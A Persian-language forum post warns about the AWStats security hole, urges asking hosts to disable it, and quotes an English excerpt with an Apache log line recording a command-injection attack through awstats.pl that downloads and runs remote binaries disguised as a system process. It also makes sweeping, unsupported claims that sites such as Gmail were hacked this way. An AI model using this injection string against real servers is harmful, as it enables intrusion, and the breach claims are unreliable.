اخطار Awstats

[moon_spell]

AWSTATS يکی از حفره های امنيتی خطرناک است که طی سال های گذشته مثلاً 3 سال پيش چندين سايت بزرگ مثل phpbb با 115000 کاربر و ixmasters , Gmail که بروز ترين تدابير امنيتی رو داشتند ، به آسانی هک شدند !!!!!

پيشنهاد : از مدير هاست خود بخواهيد که AWSTATS را از کار بيندازند در سی پنل و از آخرين پاتچ های امنيتی استفاده کنند ......​

شخص يا گروهی که phpbb را هک کرده بودن پيغام زير را به جا گزشتند ....​

The persons who attacked the site deleted all web access logs,
all system logs and the root user log.
Other critical system folders/files were also deleted

که هيچ اثر و نشانه اي از نقطه هک شده به جا نزاشتند ...و سايت phpbb و vb توسط email تهديد شدند که بايد انقدر تدابير امنيتی را قوی کنند که قابليت نفوذ ب1% برسد!!!! در غير اين صورت در نفوذ بعدی باز هم اطلاعات و تمام لگ ها پاک خواهند شود ! حتی کش ....که به صورتی هک خواهند شد که ....

به اميد روزی که هکر ها در هنگام نفوذ به اطلاعات سايت کاری نداشه باشند و فقط جهت رفع اين حفره ها تلاش کنند .......​

اينم از AWSTATS ,,,,,,,,,,,,,​

AWSTATS Security Hole Hack In Action​

If you're using AWSTATS for your web, mail or ftp stats, you might be interested in this well-documented hack that was forwarded to me by one of my monkey minions.
First, we look at an Apache web server log:​

combined_log:201-0-74-103.dsl.telesp.net.br - - [15/Feb/2005:16:37:01
-0600] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20http://www.turbo-nutters.co.uk/images/dos;wget%20http://www.turbo-nutters.co.uk/ashprojects/xh;chmod%20777%20xh;chmod%20777%20dos;./xh%20-s%20\"klogd%20-m%200\"%20-d%20-p%20.test.pid%20./dos;echo%20;echo|
HTTP/1.0" 200 669 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT
5.0)"​

البته اين شرکت فقط​

firefox رو قبول داره و با اکسپلرر زياد خوب نيست !!! به همين دليل هم هماهنگی اين برنامه بيشتر با firefox هست !​

http://awstats.net/ يکی از حفره های امنيتی خطرناک !